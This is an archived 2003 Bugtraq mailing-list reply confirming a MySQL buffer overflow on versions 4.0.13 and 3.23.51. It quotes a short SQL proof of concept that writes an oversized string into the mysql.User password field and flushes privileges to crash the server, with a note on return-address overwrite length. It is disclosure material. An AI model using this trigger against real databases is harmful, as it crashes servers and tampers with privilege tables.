[31583] in bugtraq
Re: Buffer overflow in MySQL
daemon@ATHENA.MIT.EDU (Konstantin Tsolov)
Fri Sep 12 18:44:13 2003
Content-Type: text/plain;
charset="iso-8859-1"
From: Konstantin Tsolov <ktsolov@etel.bg>
To: bugtraq@securityfocus.com
Date: Thu, 11 Sep 2003 13:41:29 +0300
In-Reply-To: <20030910213018.GA5167@c9x.org>
MIME-Version: 1.0
Message-Id: <200309111341.29638.ktsolov@etel.bg>
Content-Transfer-Encoding: 8bit
managed to replicate on 4.0.13 (custom made) running on slack8.1 with
mysql.mysql.
3.23.51 (the distro mysql version) also proved vulnerable.
nb: just make sure you have a backup copy of your mysql db when testing this
harmless proof of concept on your production server :-)
> successful exploitation of that bug is trivial on some platforms. On most
> Linux systems the return address needs about 444 bytes to get overwritten.
>
> Harmless proof of concept :
> > USE mysql;
> > ALTER TABLE User CHANGE COLUMN Password Password LONGTEXT;
> > UPDATE User SET Password =
>
> '123456781234567812345678123456781234567812345678123456781234567812345678
> 123456781234567812345678123456781234567812345678123456781234567812345678
> 123456781234567812345678123456781234567812345678123456781234567812345678
> 12345678123456781234567812345678...' WHERE User = 'abcd';
>
> > FLUSH PRIVILEGES;
>
> [Connection lost]
--
"Talk is cheap because supply always exceeds demand."
-- source unknown
+------------------------------------------------------+
| Konstantin Tsolov ktsolov at etel dot bg |
| Systems Administrator - VoIP |
| eTel Ltd. www.etel.bg |
| Sofia, Bulgaria |
+------------------------------------------------------+
